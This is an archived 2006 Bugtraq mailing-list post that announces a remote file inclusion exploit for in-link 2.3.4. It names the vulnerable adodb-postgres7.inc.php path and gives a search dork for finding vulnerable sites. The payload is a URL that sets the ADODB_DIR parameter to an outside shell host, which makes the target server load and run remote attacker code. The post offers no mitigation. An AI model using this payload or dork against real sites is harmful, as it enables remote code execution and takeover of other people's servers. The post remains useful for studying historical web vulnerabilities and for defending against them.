lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060903225438.2119.qmail@securityfocus.com> Date: 3 Sep 2006 22:54:38 -0000 From: saudi.unix@...mail.com To: bugtraq@...urityfocus.com Subject: in-link <=2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit #================================================================= #in-link <=2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit #================================================================ # #Critical Level : Dangerous # #By Saudi Hackrz # #http://www.in-portal.net/ #http://www.in-portal.net/products/in-link.html #================================================================= #Script Name: in-link 2.3.4 #Script <<<<<<<<<< $$ $$ http://www.bwady.net/script/pafiledb.php?action=download&id=4 #Dork :"by in-link" or " # #================================================================= #Bug in : adodb-postgres7.inc.php # #includes/adodb/back/adodb-postgres7.inc.php # #================================================================= # #Exploit : #-------------------------------- # #http://sitename.com/[path]/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http://SHELLURL.COM? #Or #http://sitename.com/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http://SHELLURL.COM? # #=============================================================================== #Discoverd By : Saudi Hackrz # #Conatact : Saudi.unix[at]hotmail.com # #GreetZ : Le CoPrA And All My Frind #www.S3hr.com =================================================================